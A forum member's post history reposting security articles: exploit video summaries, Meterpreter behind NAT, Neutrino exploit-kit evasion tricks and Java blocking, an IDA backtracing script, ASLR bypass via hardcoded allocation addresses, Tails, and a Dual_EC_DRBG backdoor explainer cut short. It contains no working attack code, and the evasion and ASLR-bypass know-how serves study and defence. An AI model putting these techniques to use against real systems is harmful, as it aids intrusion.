Jump to content

Nytro

Administrators
  • Posts

    18715
  • Joined

  • Last visited

  • Days Won

    701

Everything posted by Nytro

  1. Windows Exploitation (Structured Exception Handler Based Exploitation) Description: This video demos a Structured Exception Handler (SEH) stack overflow exploit. It gives some basic idea about the SEH structure in windows operating system. It explains the technique used to perform exploitation. Sursa: Windows Exploitation (Structured Exception Handler Based Exploitation)
  2. Metasploit Meterpreter and NAT Published January 4, 2014 | By Corelan Team (corelanc0d3r) Professional pentesters typically use a host that is connected directly to the internet, has a public IP address, and is not hindered by any firewalls or NAT devices to perform their audit. Hacking "naked" is considered to be the easiest way to perform a penetration test that involves getting shells back. Not everyone has the luxury of putting a box directly connected to the internet and as the number of free public IP addresses continues to decrease, the need for using an audit box placed in a LAN, behind a router or firewall, will increase. Putting an audit box behind a device that will translate traffic from private to public and vice versa has some consequences. Not only will you need to be sure that the NAT device won’t "break" if you start a rather fast portscan, but since the host is in a private LAN, behind a router or firewall, it won’t be reachable directly from the internet. Serving exploits and handling reverse, incoming, shells can be problematic in this scenario. In this small post, we’ll look at how to correctly configure Meterpreter payloads and make them work when your audit box is behind a NAT device. We’ll use a browser exploit to demonstrate how to get a working Meterpreter session, even if both the target and the Metasploit "attacker" box are behind NAT. Articol: https://www.corelan.be/index.php/2014/01/04/metasploit-meterpreter-and-nat/
  3. Windows Exploitation (Simple Stack Overflow) Description: This video demos a simple stack overflow exploit. It gives some basic idea about the application that is being exploited, some idea about the exploit and demos how a debugger can be used to perform exploitation. Sursa: Windows Exploitation (Simple Stack Overflow)
  4. Nytro

    Titlul gresit

    Fixed.
  5. Ati inceput noul an ca niste pizde, va plangeti din orice rahat.
  6. Nytro

    Fun stuff

  7. Nytro

    Bug sau...

    Din cate se pare, sunt pe "invisible".
  8. Nytro

    Bug sau...

    Fa un screenshot.
  9. Done. Langa "Mark forums as read", jos.
  10. Nu am inteles. Sa pun link cu "New posts" langa "Mark forums as read"?
  11. V-am pus "Mark forums as read", verificati daca merge. Am pus si link de "Send PM". Verificati.
  12. [h=3]Effective blocking of Java exploits in enterprise environments[/h] [h=2]Preface[/h] "Java everyday" was a joke about Java vulnerabilities, where almost every day a new Java zero-day was seen. Recently, the "Java 0-day spotted in the wild" is no longer in the headlines every week (see http://java-0day.com), but Java exploits are still the biggest concern regarding exploit kits and drive-by-download malware. In a recent Kaspersky report, they found that about 90% of the exploit kits were trying to infect the victim machine via Java. [h=2]The "typical useless" recommendations[/h] Okay, so we have a problem called Java in the browser, let's look for a solution! The two simplest "solutions" of all are: Update your Java. Remove Java from your browser. Both solutions are non-solutions for enterprises. Still, a hell a lot of in-house-built applications need old Java - e.g. 1.6.x, which is end-of-life since February 2013. Next recommended "solution" is: "Create separate browsers for Internet and intranet usage. The intranet facing browser supports Java, the Internet facing does not." Although this sounds pretty effective, there are still a lot of problems with this approach. Now IT has to update two browsers instead of one. Users has to be trained, and in a web-security gateway (web proxy) one has to configure that this browser can go there but the other can't, etc. And still there might be Java applet based applications outside of the organization which has to be used by a bunch of people. Next solution: "Use NoScript". LOL. Teach NoScript to 50000 users, and see how they will learn the "Allow all this page" first, and "Allow scripts globally" the next time. Next solution: "Click-to-play" I think this is a good countermeasure, but from now on the exploit maker either needs an exploit to bypass the click-t-play, or to socially engineer the user to click so this is not a bulletproof solution either. [h=2]The solution[/h] Okay, so far we have five totally useless recommendations. The next one seems pretty good at the first sight: "White-list websites which need Java, and only allow Java to these sites." Let's dig deeper. How can we "white-list" sites? This is not supported from Java out-of-the-box. In a decent web-security gateway one can create white-lists, but we have to define a condition for Java traffic. A common misconception is to say: let's identify Java traffic for .class, .jar, and .jnlp file extensions, and only allow Java for white-listed websites. Although this will block some exploits, but not all. Here is a screenshots from the very popular Neutrino exploit kit: This is the .jar exploit. As you can see, there is no extension at all in the HTTP request (e.g. .jar). But what about the Mime-type in the response? It is video/quicktime… But it is the jar exploit, with a detection of 2/49 on Virustotal. And, yes, I'm aware of the fact that Virustotal statistics are useless and AV has other possibilities in the exploit chain to block the malware being dropped. Or not Two things can be flagged here as Java: the User-agent and the Mime-type in the request. I recommend checking for both. The User-agent can be checked via regular expressions, and if one matches, flag it as Java request. [h=2]Payload delivery[/h] Although not closely related to the exploit, but the malware payload delivery is interesting as well. After successful exploitation, the exploit payload downloads the malware from the the same site. In a normal web-security gateway, executables can be flagged, and blocked for average users. Now look at the Neutrino exploit kit: No executable extension (e.g. .exe, .dll), the response Mime-type is faked to audio/mpeg, and even the malware is XOR encrypted with a 4 character key (I let the exercise to the reader to guess the XOR key). Even if the web-security gateway looks for file headers to identify executables, it won't find it. The malware is decrypted only on the victim, where the AV might or might not find it. Although the User-agent here is Java again, be aware of the fact that at this stage, the User-agent can be faked by the exploit. [h=2]Mobile devices[/h] If we white-list sites on the web-security gateway, and block any other traffic when we see Java based User-agent or content-type, we are good. Well, almost. As long as the client is in the enterprise… What you can do here is to enforce the mobile devices the use of VPN every time it is outside of the corporate network, and only connect it to the Internet through the corporate web-security gateway. I know, this is still not a solution, but I can't think anything better at the moment. Leave a comment if you have a solution for this. Now the only Java threat is that someone hacks one of the white-listed websites in a watering hole attack, and serves the java exploit from the same page. Not a likely attack, but possible for a real advanced threat. [h=2]Conclusion[/h] If you are a CISO (or has the same position), you should proactively block Java exploits. White-listing websites which require Java is not impossible. Not a lot of sites use Java applets nowadays anyways. I would say average users see Java applets more in an exploit than in a legit site... You can flag Java traffic via User-agent regular expression, or content-type (in the request), or both. Special care needs to be taken on mobile devices, which leave the enterprise on a regular basis. Of course, you will need other protections too, because this is not a 100% solution. And if you are a plain home user, you can safely delete Java from your browser, or use a decent Internet Security Suite which can effectively block Java exploits. Posted by Z at 1:30:00 PM Sursa: Jump ESP, jump!: Effective blocking of Java exploits in enterprise environments
  13. The 2013 Top 7 Best Linux Distributions for You Thursday, 14 March 2013 09:00 Katherine Noyes Back in 2010 Linux.com published a list of the year's top Linux distributions, and the popularity of the topic made it an instant annual tradition. There have been several shifts and shakeups on the lists presented since then, of course, and -– as you'll soon see – this year's offering holds true to that pattern. In fact, I think it's safe to say that the past year has seen so much upheaval in the desktop world – particularly where desktop environments are concerned – that 2013's list could come as a surprise to some. Let me hasten to note that the evaluations made here are nothing if not subjective. There also is no such thing as the “one best” Linux distro for anything; in fact, much of the beauty of Linux is its diversity and the fact that it can be tweaked and customized for virtually any taste or purpose. The one best Linux for you, in other words, is the flavor you choose for your purpose and preference and then tweak until it feels just right. Still, I think some Linux flavors stand out these days as leaders for particular use cases. I'm going to diverge a bit from past lists here when it comes to those categories, however. Specifically, where past lists have included the category “Best Linux LiveCD,” I think that's become almost obsolete given not just the general shift to USBs -- some PCs don't even come with CD drives anymore, in fact -- but also the fact that most any Linux distro can be formatted into bootable form. On the other hand, with the arrival of Steam for Linux, I think this year has brought the need for a new category: Best Linux for Gaming. Read on, then, for a rundown of some of the best of what the Linux world has to offer. Best Desktop Distribution There are so many excellent contenders for desktop Linux this year that it's become a more difficult choice than ever – and that's really saying something. Canonical's Ubuntu has made great strides in advancing Linux's visibility in the public eye, of course, while Linux Mint and Fedora are both also very strong choices. Regarding Ubuntu, however, a number of issues have come up over the past year or so, including the inclusion of online shopping results in searches – an addition Richard Stallman and the EFF have called “spyware.” At the same time, the upheaval caused by the introduction of mobile-inspired desktops such as Unity and GNOME 3 continues unabated, spurring the launch of more classically minded new desktops such as MATE and Cinnamon along with brand-new distros. For best desktop Linux distro, I have to go with Fuduntu, one of this new breed of up-and-comers. Originally based on Fedora but later forked, Fuduntu offers a classic GNOME 2 interface – developed for the desktop, not for mobile devices -- and generally seems to get everything right. Besides delivering the classic desktop so many Linux users have made clear that they prefer, Fuduntu enjoys all the advantages of being a rolling release distribution, and its repository includes key packages such as Netflix and Steam. I've been using it for months now and haven't seen a single reason to switch. Best Laptop Distribution At the risk of sounding repetitive, I have to go with Fuduntu for best Linux distro as well. In fact, the distro is optimized for mobile computing on laptops and netbooks, including tools to help achieve maximum battery life when untethered. Users can see battery life improvements of 30 percent or more over other Linux distributions, the distro's developers say. Such optimizations combined with this solid and classic distro make for a winner on portable devices as well. Best Enterprise Desktop Linux The enterprise is one context in which I have to agree with recent years' evaluations, and that includes the enterprise desktop. While SUSE Linux Enterprise Desktop is surely RHEL's primary competitor, I think Red Hat Enterprise Linux is the clear leader in this area, with just the right combination of security, interoperability, productivity applications and management features. Best Enterprise Server Linux It's a similar situation on the server. While there's no denying SUSE Linux Enterprise Server has its advantages, Red Hat is pushing ahead in exciting new ways. Particularly notable about Red Hat this year, for example, is its new focus on Big Data and the hybrid cloud, bringing a fresh new world of possibilities to its customers. Best Security-Enhanced Distribution Security, of course, is one of the areas in which Linux really stands out from its proprietary competitors, due not just to the nature of Linux itself but also to the availability of several security-focused Linux distributions. Lightweight Portable Security is one relatively new contender that emerged back in 2011, and BackBox is another popular Ubuntu-based contender, but I still have to give my vote to BackTrack Linux, the heavyweight in this area whose penetration testing framework is used by the security community all over the world. Others surely have their advantages, but BackTrack is still the one to beat. Best Multimedia Distribution Ubuntu Studio has often been named the best distro for multimedia purposes in Linux.com's lists, but it's by no means the only contender. ZevenOS, for instance, is an interesting BeOS-flavored contender that came out with a major update last year. For sheer power and nimble performance, though, this year's nod goes to Arch Linux. With an active community and thousands of software packages available in its repositories, Arch stays out of the way so your PC can focus on the CPU-intensive tasks at hand. Best Gaming Distribution Last but certainly not least is the gaming category, which surely represents one of the biggest developments in the Linux world over this past year. While it may not be relevant for enterprise audiences, gaming has long been held up as a key reason many users have stayed with Windows, so Valve's decision to bring its Steam gaming platform to Linux is nothing if not significant. The Linux distro choice here? That would have to be Ubuntu, which is specifically promoted by the Valve team itself. “Best experienced on Ubuntu” reads the tag line that accompanied the Steam for Linux release last month, in fact. Bottom line: If you're into gaming, Ubuntu Linux is the way to go. Have a different view on any of these categories? Please share your thoughts in the comments. Sursa: The 2013 Top 7 Best Linux Distributions for You | Linux.com
  14. [h=1]BSidesDE 2013 2 2 antipwny a windows based ids ips for metasploit rohan vazarkar david bitner[/h] Bsides Delaware 2013 Videos(Hacking Illustrated Series InfoSec Tutorial Videos)
  15. [h=3]backtrace.py version 0.3[/h] backtrace.py version 0.3 has been pushed out to it's repo. A couple of notable features have been added. The previous version only tracked the use of the MOV instruction. This is kind of useful..I guess..well at least it was fun to code. The current version tracks whenever a register(ECX) or it's sub-register (CX) are manipulated. The old version relied on string comparisons. For example if we back trace from the highlighted code up we would see al is referenced then EAX, then byte_1003B03C, then dl, etc.. .text:10004E99 mov byte_1003B03C, al .text:10004E9E movsx ecx, byte_1003B03C .text:10004EA5 imul ecx, 0A2h .text:10004EAB mov byte_1003B03C, cl .text:10004EB1 movsx edx, byte_1003B03C .text:10004EB8 xor edx, 0A4h .text:10004EBE mov byte_1003B03C, dl .text:10004EC4 movsx eax, byte_1003B03C .text:10004ECB cdq .text:10004ECC mov ecx, 0C8h .text:10004ED1 idiv ecx .text:10004ED3 mov byte_1003B03C, al .text:10004ED8 xor eax, eax .text:10004EDA jmp short loc_10004F01 .text:10004EDC ; --------------------------------------------------------------------------- .text:10004EDC movsx edx, byte_1003B03C .text:10004EE3 or edx, 0D2h .text:10004EE9 mov byte_1003B03C, dl .text:10004EEF movsx eax, byte_1003B03C .text:10004EF6 imul eax, 0C1h .text:10004EFC mov byte_1003B03C, al The old version did not know that AL is the lower address of EAX due to the use of string comparison. The new version does a simple check of the register name and it's purpose. Note: there will be some issues if AH is moved into AL or other similar operations. I didn't code that logic in. If we were to back trace the code above we would have the following output. Python>s.backtrace(here(),1) 0x10004efc mov byte_1003B03C, al 0x10004ef6 imul eax, 0C1h 0x10004eef movsx eax, byte_1003B03C 0x10004ee9 mov byte_1003B03C, dl 0x10004ee3 or edx, 0D2h 0x10004edc movsx edx, byte_1003B03C 0x10004ed3 mov byte_1003B03C, al 0x10004ec4 movsx eax, byte_1003B03C 0x10004ebe mov byte_1003B03C, dl 0x10004eb8 xor edx, 0A4h 0x10004eb1 movsx edx, byte_1003B03C 0x10004eab mov byte_1003B03C, cl 0x10004ea5 imul ecx, 0A2h 0x10004e9e movsx ecx, byte_1003B03C 0x10004e99 mov byte_1003B03C, al The code also tracks how some general purpose instructions manipulate different registers. Most of them are simple due to the x86 standard of instruction destination source format. Not all of them are though. I spent a good amount of time wondering what variables to back trace when following instructions such as DIV. Is EAX or the DIV operand more important back trace? I went with the operand but in the future I plan on creating back split trace that will track EAX and the operand passed to DIV. Odds are there are still more general purpose instructions I need to check for. XADD is a pretty cool instruction. The shortest Fibonacci can be written using XADD. This version was written in order for me to crack an obfuscation technique that I have seen lately. Using backtrace.py and the last line of the dead code blocks I'm able to identify most of the junk code and variables. I'm sure there are flaws (like not tracing push or pops...future release) but so far it is working well for me. I hope the code is of use to others. If you have any recommendations, thoughts, etc please shoot me an email (line 20 of the source code) or ping me on twitter. Sursa: Hooked on Mnemonics Worked for Me: backtrace.py version 0.3
  16. [h=3]Hardcoded Pointers[/h]Use of hardcoded pointer could enable the attacker to bypass ASLR. In this draft I'm describing potential methods to find a hardcoded pointer in your target. When exploiting particular vulnerabilities it is fundamental to read/write or jump to predictable memory location in the process' address space. ASLR randomizes the memory locations of various key locations including addresses of libraries. Even though we see that some high profile applications still load libraries with ASLR disabled, we have high hopes they will fix the problem soon. That wouldn't solve the problem overall though. Applying ASLR to all libraries does not mean there is not easily predictable locations in the process' address space. There are API functions that accept address to allocate memory at that address. These functions can be used to hardcode memory address, and so to assign a fixed address to a pointer (CWE-587). As a consequence, it gives an attacker a chance to read/write or jump to known address to bypass ASLR. For these functions you can specify the desired starting address that you want to allocate. When doing security audit it's worth checking if the functions are called with hardcoded addresses. VirtualAlloc VirtualAllocEx VirtualAllocExNuma MapViewOfFileEx MapViewOfFileExNuma The following functions accept address to read as parameter. These are not appear to be useful but leave them for potential future use. UnmapViewOfFile, WriteProcessMemory, ReadProcessMemory, FlushViewOfFile, FlushInstructionCache, Toolhelp32ReadProcessMemory, GetWriteWatch, ResetWriteWatch, ReadProcessMemoryProc64, VirtualUnlock, MapUserPhysicalPages, VirtualProtect, VirtualProtectEx, VirtualQueryEx, GetFrameSourceAddress, CompareFrameDestAddress, VirtualFree, VirtualFreeEx, FindNextFrame, WSPStringToAddress, CompareAddresses, AddressToString It's also worth checking if the application you audit uses shared memory as some application map the memory at fixed address, and even boost library supports the use of this insecure method. The use of relative pointers is less efficient than using raw pointers, so if a user can succeed mapping the same file or shared memory object in the same address in two processes, using raw pointers can be a good idea. To map an object in a fixed address, the user can specify that address in the mapped region's constructor: mapped_region region ( shm //Map shared memory , read_write //Map it as read-write , 0 //Map from offset 0 , 0 //Map until the end , (void*)0x3F000000 //Map it exactly there ); When auditing source code for hardcoded address it's worth looking for constant starting with 0x ending with 0000 as some might indicate hardcoded memory address. I wrote a simple batch script for that. The another batch script I have is for binary code. I recommend to use if you don't find a bug using other methods. To use it you need to execute dasmdir.py on the binary file to produce disassembly, and you may run the batch script on it to get the immediate values filtered. This is interesting. Here is an example of someone asking how to allocate memory at fixed address unintentionally making his software less secure. Sursa: Reversing on Windows: Hardcoded Pointers
  17. toolsmith: Tails - The Amnesiac Incognito Live System Privacy for anyone anywhere Prerequisites/dependencies Systems that can boot DVD, USB, or SD media (x86, no PowerPC or ARM), 1GB RAM Introduction “We will open the book. Its pages are blank. We are going to put words on them ourselves. The book is called Opportunity and its first chapter is New Year's Day.” -Edith Lovejoy Pierce First and foremost, Happy New Year! If you haven’t read or heard about the perpetual stream of rather incredible disclosures continuing to emerge regarding the NSA’s activities as revealed by Edward Snowden, you’ve likely been completely untethered from the Matrix or have indeed been hiding under the proverbial rock. As the ISSA Journal focuses on Cyber Security and Compliance for the January 2014 issue, I thought it a great opportunity to weave a few privacy related current events into the discussion while operating under the auspicious umbrella of the Cyber Security label. The most recent article that caught my attention was Reuters reporting that “as a key part of a campaign to embed encryption software that it could crack into widely used computer products, the U.S. National Security Agency arranged a secret $10 million contract with RSA, one of the most influential firms in the computer security industry.” The report indicates that RSA received $10M from the NSA in exchange for utilizing the agency-backed Dual Elliptic Curve Deterministic Random Bit Generator (Dual EC DRBG) as its preferred random number algorithm, an allegation that RSA denies in part. In September 2013 the New York Times reported that an NSA memo released by Snowden declared that “cryptanalytic capabilities are now coming online…vast amounts of encrypted Internet data which have up till now been discarded are now exploitable." Ars Technica’s Dan Goodin described Operation Bullrun as a “a combination of ‘supercomputers, technical trickery, court orders, and behind-the-scenes persuasion’ to undermine basic staples of Internet privacy, including virtual private networks (VPNs) and the widely used secure sockets layer (SSL) and transport layer security (TLS) protocols.” Finally, consider that, again as reported by DanG, a senior NSA cryptographer, Kevin Igoe, is also the co-chair of the Internet Engineering Task Force’s (IETF) Crypto Forum Research Group (CFRG). What could possibly go wrong? According to Dan, Igoe's leadership had largely gone unnoticed until the above mentioned reports surfaced in September 2013 exposing the role NSA agents have played in "deliberately weakening the international encryption standards adopted by developers." I must admit I am conflicted. I believe in protecting the American citizenry above all else. The NSA claims that their surveillance efforts have thwarted attacks against America. Regardless of the debate over the right or wrong of how or if this was achieved, I honor the intent. Yet, while I believe Snowden’s actions are traitorous, as an Internet denizen I can understand his concerns. The problem is that he swore an oath to his country, was well paid to honor it, and then violated it. Regardless of my take on these events and revelations, my obligation to you is to provide you with tooling options. The Information Systems Security Association (ISSA) is an international organization of information security professionals and practitioners. As such, are there means by which our global readership can better practice Internet privacy and security? While there is no panacea, I propose that the likes of The Amnesiac Incognito Live System, or Tails, might contribute to the cause. Again, per the Tails team themselves: “Even though we're doing our best to offer you good tools to protect your privacy while using a computer, there is no magic or perfect solution to such a complex problem.” That said, Tails endeavors to help you preserve your privacy and anonymity. Tails documentation is fabulous; you would do well to start with a full read before using Tails to protect your privacy for the first time. Tails Tails, a merger of the Amnesia and Incognito projects, is a Debian 6 (Squeeze) Linux distribution that works optimally as a live instance via DVD, USB, or SD media. Tails seeks to provide online anonymity and censorship circumvention with the Tor anonymity network to protect your privacy online. All software is configured to connect to the Internet through Tor and if an application tries to connect to the Internet directly, the connection is automatically blocked for security purposes. At this point the well informed amongst you are likely uttering a “whiskey tango foxtrot, Russ, in October The Guardian revealed that the NSA targeted the Tor network.” Yes, true that, but it doesn’t mean that you can’t safely use Tor in a manner that protects you. This is a great opportunity however to direct you to the Tails warning page. Please read this before you do anything else, it’s important. Schneier’s Guardian article also provides nuance. “The fact that all Tor users look alike on the internet, makes it easy to differentiate Tor users from other web users. On the other hand, the anonymity provided by Tor makes it impossible for the NSA to know who the user is, or whether or not the user is in the US.” Getting under way with Tails is easy. Download it, burn it to your preferred media, load the media into your preferred system, and boot it up. I prefer using Tails on USB media inclusive of a persistence volume, just remember to format the USB media in a manner that leaves room to create the persistent volume. When you boot Tails, the first thing you’ll see, as noted in Figure 1 is the Tails Greeter which offers you More Options. Selecting Yes leads you to the option to set an administrative password (recommended) as well as Windows XP Camouflage mode (makes Tails look like Windows XP when you may have shoulder surfers). [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD]FIGURE 1: Tails Greeter[/TD] [/TR] [/TABLE] You can also boot into a virtual machine, but there are some specific drawbacks to this method (the host operating system and the virtualization software can monitor what you are doing in Tails). However Tails will warn you as seen in Figure 2. [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD]FIGURE 2: Tails warns regarding a VM and confirms Tor[/TD] [/TR] [/TABLE] Tor You’ll also note in Figure 2 that TorBrowser (built on Iceweasel, a Firefox alternative) is already configured to use Tor, including the Torbutton, as well as NoScript, Cookie Monster, and Adblock Plus add-ons. There is one Tor enhancement to consider that can be added during the boot menu sequence for Tails where you can interrupt the boot sequence with Tab, hit Space, and then add bridge to enable Tor Bridge Mode. According to the Tor Project, bridge relays or bridges for short are Tor relays that aren't listed in the main Tor directory. As such, even if your ISP is filtering connections to all known Tor relays, they probably won't be able to block all bridges. If you suspect access to the Tor network is being blocked, consider use of the Tor bridge feature as supported fully by Tails when booting in bridge mode. Control Tor with Vidalia which is available via the onion icon the notification area found in the upper right area of the Tails UI. One last note on Tor use as already described on the Tails Warning page you should have already read. Your Tor use is only as good as your exit node. Remember, “Tor is about hiding your location, not about encrypting your communication.” Tor does not, and cannot, encrypt the traffic between an exit node and the destination server. Therefore, any Tor exit node is in a position to capture any traffic passing through it and you should thus use end-to-end encryption for all communications. Be aware that Tails also offers I2P as an alternative to Tor. Encryption Options and Features HTTPS Everywhere is already configured for you in Tor Browser. HTTPS Everywhere uses a ruleset with regular expressions to rewrite URLs to HTTPS. Certain sites offer limited or partial support for encryption over HTTPS, but make it difficult to use where they may default to unencrypted HTTP, or provide hyperlinks on encrypted pages that point back to the unencrypted site. You can use Pidgin for instant messaging which includes OTR or off-the-record encryption. Each time you start Tails you can count on it to generate a random username for all Pidgin accounts. If you’re afraid the computer you’ve booted Tails on (a system in an Internet café or library) is not trustworthy due to the like of a hardware keylogger, you can use the Florence virtual keyboard, also found in the notification area as seen in Figure 3. [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD]FIGURE 3: The Tails virtual keyboard[/TD] [/TR] [/TABLE] If you’re going to create a persistent volume (recommended) when you use Tails from USB media, do so easily with Applications | Tails | Configure persistent volume. Reboot, then be sure to enable persistence with the Tails Greeter. You will need to setup the USB stick to leave unused space for a persistent volume. You can securely wipe files and cleanup available space thereafter with Nautilus Wipe. Just right click a file or files in the Nautilus file manager and select Wipe to blow it away…forever…in perpetuity. KeePassX is available to securely manage passwords and store them on your persistent volume. You can also configure all your keyrings (GPG, Gnome, Pidgin) as well as Claws Mail. Remember, the persistent volume is encrypted upon creation. You can encrypt text with a passphrase, encrypt and sign text with a public key, and decrypt and verify text with the Tails gpgApplet (the clipboard in the notification area). One last cool Tails feature that doesn’t garner much attention is the Metadata Anonymisation app. This is not unlike Informatica 64’s OOMetaExtractor, the same folks who bring you FOCA as described in the March 2011 toolsmith. Metadata Anonymisation is found under Applications then Accessories. This application will strip all of those interesting file properties left in metadata such as author names and date of creation or change. I have used my share of metadata to create a target list for social engineering during penetration tests so it’s definitely a good idea to clean docs if you’re going to publish or share them if you wish to remain anonymous. Figure 4 shows a before and after collage of PowerPoint metadata for a recent presentation I gave. There are numerous opportunities to protect yourself using The Amnesiac Incognito Live System and I strongly advocate for you keeping an instance at the ready should you need it. It’s ideal for those of you who travel to hostile computing environments, as well as for those of you non-US readers who may not benefit from the same level of personal freedoms and protection from censorship that we typically enjoy here in the States (tongue somewhat in cheek given current events described herein). Conclusion Aside from hoping you’ll give Tails a good look and make use of it, I’d like to leave you with two related resources well worth your attention. The first is a 2007 presentation from Dan Shumow and Niels Ferguson of Microsoft titled On the Possibility of a Back Door in the NIST SP800-90 Dual Ec Prng. Yep, the same random number generator as described in the introduction to this column. The second resource is from bettercrypto.org and is called Applied Crypto Hardening. Systems administrators should definitely give this one a read. Enjoy your efforts to shield yourself from watchful eyes and ears and let me know what you think of Tails. Ping me via Twitter via @holisticinfosec or email if you have questions (russ at holisticinfosec dot org). Cheers…until next month. Posted by Russ McRee at 9:58 AM Sursa: HolisticInfoSec: toolsmith: Tails - The Amnesiac Incognito Live System
  18. Apple Says It Has Never Worked With NSA To Create iPhone Backdoors, Is Unaware Of Alleged DROPOUTJEEP Snooping Program Posted yesterday by Matthew Panzarino (@panzer) Apple has contacted TechCrunch with a statement about the DROPOUTJEEP NSA program that detailed a system by which the organization claimed it could snoop on iPhone users. Apple says that it has never worked with the NSA to create any ‘backdoors’ that would allow that kind of monitoring, and that it was unaware of any programs to do so. Here is the full statement from Apple: Apple has never worked with the NSA to create a backdoor in any of our products, including iPhone. Additionally, we have been unaware of this alleged NSA program targeting our products. We care deeply about our customers’ privacy and security. Our team is continuously working to make our products even more secure, and we make it easy for customers to keep their software up to date with the latest advancements. Whenever we hear about attempts to undermine Apple’s industry-leading security, we thoroughly investigate and take appropriate steps to protect our customers. We will continue to use our resources to stay ahead of malicious hackers and defend our customers from security attacks, regardless of who’s behind them. The statement is a response to a report in Der Spiegel Sunday that detailed a Tailored Access Operations (TAO) unit within the NSA that is tasked with gaining access to foreign computer systems in order to retrieve data to protect national security. The report also pointed out a division called ANT that was set up to compile information about hacking consumer electronics, networking systems and more. The story detailed dozens of devices and methods, including prices for deployment, in a catalogue that could be used by the NSA to pick and choose the tools it needed for snooping. The 50-page catalog included a variety of hacking tools that targeted laptops and mobile phones and other consumer devices. Der Spiegel said that these programs were evidence that the NSA had ‘backdoors’ into computing devices that many consumers use. Among these options was a program called DROPOUTJEEP — a program by which the NSA could theoretically snoop on ‘any’ Apple iPhone with ’100% success’. The documents were dated 2008, implying that these methods were for older devices. Still, the program’s detailed capabilities are worrisome. Researcher and hacker Jacob Applebaum — the co-author of the articles, coinciding with a speech he gave at a conference about the programs — pointed out that the ’100% success rate’ claimed by the NSA was worrisome as it implied cooperation by Apple. The statement from the company appears to preclude that cooperation. The program detail indicated that the NSA needed physical access to the devices at the time that the documents were published. It does note that they were working on ‘remote installation capability’ but there’s no indication whether that was actually successful. The program’s other options included physical interdiction of devices like laptops to install snooping devices — but there have been security advances like hardware encryption in recent iPhone models that would make modification of devices much more difficult. Early reports of the DROPOUTJEEP program made it appear as if every iPhone user was vulnerable to this — which simply can’t be the case. Physical access to a device was required which would preclude the NSA from simply ‘flipping a switch’ to snoop on any user. And Apple patches security holes with every version of iOS. The high adoption rate of new versions of iOS also means that those patches are delivered to users very quickly and on a large scale. The jailbreak community, for instance, knows that once a vulnerability has been used to open up the iPhone’s file system for modification, it’s been ‘burned’ and will likely be patched by Apple quickly. And the process of jailbreaking fits the profile of the capabilities the NSA was detailing in its slide. Applebaum’s walked listeners through a variety of the programs including DROPOUTJEEP. He noted that the claims detailed in the slide indicated that either Apple was working with the NSA to give them a backdoor, or the NSA was just leveraging software vulnerabilities to create its own access. The Apple statement appears to clear that up — pointing to vulnerabilities in older versions of iOS that have likely since been corrected. I do also find it interesting that Apple’s statement uses extremely strong wording in response to the NSA program. “We will continue to use our resources to stay ahead of malicious hackers and defend our customers from security attacks,” the statement reads, “regardless of who’s behind them.” Lumping the program in with ‘malicious hackers’ certainly makes a clear point. This year has been an eventful one for NSA spying program revelations. Apple joined a host of large companies that denied that they had been willing participants in the PRISM data collection system — but later revelations of the MUSCULAR program indicated that the NSA could get its hands on data by monitoring internal company server communications anyway. This spurred targets like Google and Yahoo to implement internal encryption. Last month, Apple released its first ever report on government information requests, detailing the number of times domestic and foreign governments had asked it for user information. At the time, it also filed a suit with the U.S. Government to allow it to be more transparent about the number and frequency of those requests. It also began employing a ‘warrant canary’ to warn users of future compliance with Patriot Act information requests. Most recently, Apple joined AOL, Yahoo, Twitter, Microsoft, LinkedIn, Google and Facebook in requesting global government surveillance reform with an open letter. Though the NSA is located in the United States and these programs were largely designed to target ‘foreign threats’, these companies have a global customer base — making protecting user privacy abroad as well as at home just as important. Image Credit: EFF Sursa: Apple Says It Has Never Worked With NSA To Create iPhone Backdoors, Is Unaware Of Alleged DROPOUTJEEP Snooping Program | TechCrunch
  19. [h=1]Dual_EC_DRBG backdoor: a proof of concept[/h] [h=2]What’s this ?[/h] Dual_EC_DRBG is an pseudo-random number generator promoted by NIST in NIST SP 800-90A and created by NSA. This algorithm is problematic because it has been made mandatory by the FIPS norm (and should be implemented in every FIPS approved software) and some vendors even promoted this algorithm as first source of randomness in their applications. edit: I’ve been told it’s not the case anymore in FIPS-140-2 but the cat is already out of the bag If you still believe Dual_EC_DRBG was not backdoored on purpose, please keep reading. In 2007 already, Dan Shumow and Niels Ferguson from Microsoft showed that Dual_EC_DRBG algorithm could be backdoored. Twitter also uncovered recently that this algorithm was even patented in 2004 by Dan Brown (Not the Da Vinci guy, the Certicom one) as a “key escrow mechanism” (government jargon for trapdoor/backdoor). I will go a little bit further in explaining how it works and give a proof-of-concept code, based on OpenSSL FIPS. This is in the best of my knowledge the only public proof of concept published today. (correct me if I’m wrong). [h=2]Dual_EC_DRBG in a nutshell[/h] The PRNG works as following: it takes a seed that goes through a hashing algorithm. This data is then “fed” into two Elliptic Curve points, P and Q, before being slightly transformed and output. In order to understand how the algorithm (and the backdoor) works, let’s see the relevant maths from Elliptic Curves: [h=3]Elliptic curves[/h] Many types of elliptic curves exist. They are classified in function of their properties and equations. We’re going to see here the curve NIST-p256 which is one of the three curves being used by Dual_EC_DRBG. NIST-p384 and NIST-p521 have very similar characteristics. I’ll try to (poorly) give you the basic theoretics for EC, but I’m no mathematician. Please forgive me and correct me if I’m wrong. A curve is a set of points that follow a group structure. The curve is defined over several parameters (for NIST GFp curves): Equation: all the members of that group (called points) must satisfy this equation Prime modulus p: a prime number used to define the finite field Z/pZ in which the equation elements are defined. The order r: this is the order of the EC and the total number of points into the group. a and b: fixed integers used in curve’s equation. a is set to -3 in NIST GF(p) curves. A Generator point defined by Gx and Gy: This point is considered as the base element of the group. Curve members are points. A point is a pair of coordinates X and Y that satisfy the curve’s equation. They are written as capital letters such as G, P or Q. Points have some characteristics from groups: They have an addition operation (+) defined between two points. (eg. P + Q). This addition is commutative and associative. Since you can add a point with itself as many time as you want, it has a scalar multiplication, which is the multiplication of a scalar (0..n) with a point and results in another point. That scalar multiplication is associative/commutative (a(bP) = b(aP)). This scalar should be in the group of integers modulo r (the order of the curve). The group of Elliptic Curves is very useful in cryptography, because an equation such as iQ = P is very easy to resolve for Q or P (if you know i) but very hard to resolve for i (if all you know is P and Q). This is the Discrete logarithm problem in the EC group. That’s why most of the time the points are used as public parameters/keys and scalars as private counterparts. All NIST curves have different parameters p, r, a, b and points G. These parameters have been constructed from a sha1 hash of a public seed but nobody knows how the seed itself has been chosen. Enough on the theory, let’s study the PRNG ! [h=2]Dual_EC_DRBG internals[/h] Dual_EC_DRBG is defined in NIST SP800-90A page 60. It is an algorithm generating an 